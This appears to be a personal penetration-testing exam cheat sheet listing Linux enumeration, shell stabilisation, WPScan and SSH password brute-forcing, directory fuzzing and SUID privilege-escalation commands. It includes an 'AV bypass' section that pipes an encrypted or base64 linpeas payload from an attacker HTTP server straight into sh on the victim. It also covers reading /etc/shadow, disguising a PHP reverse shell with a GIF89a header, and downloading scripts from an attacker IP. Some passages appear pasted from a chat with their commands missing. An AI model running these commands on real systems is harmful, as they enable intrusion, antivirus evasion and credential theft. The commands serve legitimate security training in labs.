🍦Exam Tips

find local.txt in privilege escalation command

1. Using find Command:

The find command is powerful for locating specific files. Here are examples:

find / -type f -name "local.txt" 2>/dev/null
find / -type f -name "proof.txt" 2>/dev/null

python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
Ctrl + Z
stty raw -echo ; fg ; reset
stty columns 200 rows 200

• /: Searches the entire filesystem.

• -type f: Restricts the search to files.

• -name "local.txt": Looks for files named local.txt.

• 2>/dev/null: Suppresses error messages from directories you don’t have permission to access.

2. Using locate Command (if available):

The locate command is often faster, as it uses a database of files. Run:

Note: This command might need sudo privileges to update its database (sudo updatedb), and it may not show recent files if the database isn’t up-to-date.

3. Searching Common Sensitive Directories:

If you suspect local.txt is in specific directories (like a user's home or system directories), limit the search:

4. Using grep in Filesystem Content (if content is known):

If you’re aware of certain content within local.txt (e.g., flag content in CTF challenges), use:

These methods should help locate local.txt when performing privilege escalation tasks. Let me know if you need further guidance on privilege escalation techniques!

When you get a limited or reverse shell, you often need to stabilize it to improve functionality and usability. This typically involves upgrading it to a fully interactive shell, which enables you to use commands like Ctrl+C, arrow keys, tab completion, and copy-pasting more reliably. Here are some common methods:

1. Upgrade with Python

If the target machine has Python installed, you can use it to upgrade the shell:

Or if Python 3 is available:

After running this command, your shell will feel more stable. You can further improve it by setting terminal variables:

2. Use script Command

The script command starts a new shell session and can sometimes improve stability:

3. Upgrade with Socat

If both your machine and the target machine have socat installed, you can create a more stable reverse shell. Set up a listener on your machine:

Then, on the target machine, initiate a connection back to your machine:

4. Using rlwrap for Command History and Editing

If you're using netcat to catch a shell, you can use rlwrap to wrap it for better line-editing and command history support:

5. Backgrounding and Using stty for Terminal Control

After upgrading with Python or another method, sometimes your shell may still not respond to Ctrl+C or other commands. To fix this:

1. Background the shell by pressing Ctrl+Z.

2. Set the terminal options on your own machine:

3. Then press Enter. This will bring the shell back to the foreground, and it should now handle signals and other inputs correctly.

6. Setting Up SSH Tunneling (if possible)

If SSH access is available, consider setting up a reverse SSH tunnel or using SSH for a fully interactive session:

With these techniques, you should be able to stabilize your shell for better interactivity and control. Let me know if you encounter any issues with these steps!

Note :creating new password list using cewl commad any specific use case for the websites use the below command

cewl http://dc-2/ >passwordlist.txt

system enumeration

hostname

uname -a

cat /etc/issue

cat /proc/version

ps aux

lscpu

/bin/bash

Network enumeration

ifconfig

ipconfig

ip route

arp -a

ip neigh

netstat -ano

User Enumeration

/home

/etc/passwd

/etc/shadow

/etc/group

sudo -l

whoami

id

sudo su -

cat /etc/passwd

cat /etc/shadow

cat local.txt

Password Enumeration

sudo -l

find

ls -la

cat

locate filename

backup script

history

.bash_history

crontab

id_rsa

grep password -

grep --color=auto -rnw '/' -ie 'password' --color=always 2>/dev/null

bash -i

WPScan - Commands

• wpscan --url http://funbox.fritz.box/ -e p,t,u -P /usr/share/wordlists/rockyou.txt

• wpscan --url http://dc-2/ --disable-tls-checks -U users.txt -P cewl.txt

• Wpscan --url http://dc-2/ --disable-tls-checks --enumerate p --enumerate t --enumerate u

• wpscan --url http://dc-2/ --disable-tls-checks --enumerate p,t,u

• wpscan --url http://dc-2/ -U users.txt -P /usr/share/wordlists/rockyou.txt

• wpscan --url http://blogger.pg/assets/fonts/blog/ --enumerate p --plugins-detection aggressive

• wpscan --url http://funbox.fritz.box/ -e p,t,u

• wpscan --url http://192.168.245.78/wordpress/ -e p,t,u -P /usr/share/wordlists/rockyou.txt

• wpscan --url http://192.168.245.78/wordpress/ -U sosimpleusers.txt -P /usr/share/wordlists/rockyou.txt

Privilege Escalation Commands

• find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null

• find /bin -name nano -exec /bin/sh ;

• find / -perm -u=s -type f 2>/dev/null

• python -c 'import pty; pty.spawn("/bin/bash")'

Web Enumeration

• gobuster dir -u http://192.168.235.193/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -b 404,401 -x php,asp,js,txt,htm

• gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $URL |tee gobuster

• wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.116.209:80/FUZZ

• wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 http://192.168.190.209:80/FUZZ

• gobuster dir -u http://192.168.124.95/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

• gobuster dir -e -u http://10.10.1.28 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,cgi,sh

• gobuster dir -u http://10.10.1.24/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt t 4

Determining readable files in home directory:

• find /home -readable 2>/dev/null

• find / "local.txt" 2>/dev/null | grep "local.txt"

AV bypass

#open-ssl encryption openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc sudo python -m SimpleHTTPServer 80 #Start HTTP server curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim

#Base64 encoded base64 -w0 linpeas.sh > lp.enc sudo python -m SimpleHTTPServer 80 #Start HTTP server curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim

Enumerate users using nmap scripts

• nmap -p22 --script ssh-brute.nse 192.168.245.78 --vv

Accepting image,gif revershell in php file some sites, we can use the command in above php-reverse-shell file

GIF89a;

Grabbing id_rsa and login ssh

Rustscan flags

rustscan -a 192.168.1.7 --ulimit 5000

rustscan -a 192.168.1.7

rustscan -a 192.168.1.7 -r 21-50

rustscan -a 192.168.1.7 -- -sC -sV

How to use in few steps:linpeas/linenum

1. Download LinEnum or Linpeas from github to your victim machine.

2. Edit the permissions: chmod +x LinEnum.sh or chmod +x linpeas.sh

3. Run the script: ./LinEnum.sh or linpeas.sh

Download LinEnum/Linpeas from your attacker machine to victim machine:

1. Download LinEnum/linpeas.sh from github to your own machine.

2. Host the file on your machine which will run a local server for you on port 8000 by execeuting the following command: python3 -m http.server

3. Download the file from our server: wget <attacker ip>:8000/LinEnum.sh or wget <attacker ip>:8000/linpeas.sh

4. Edit the permissions: chmod +x LinEnum.sh / chmod +x linpeas.sh

5. Run the script: ./LinEnum.sh / ./linpeas.sh

Start python server

python -m SimpleHTTPServer 445

Tools

GitHub - expl0itabl3/Toolies: Ad hoc collection of Red Teaming & Active Directory tooling.GitHub

GitHub - saisathvik1/OSCP-Cheatsheet: OSCP Cheatsheet by Sai Sathvik RuppaGitHub

GitHub - oncybersec/oscp-enumeration-cheat-sheet: A collection of commands and tools used for conducting enumeration during my OSCP journeyGitHub

Introduction | OSCP Notesgabb4r.gitbook.io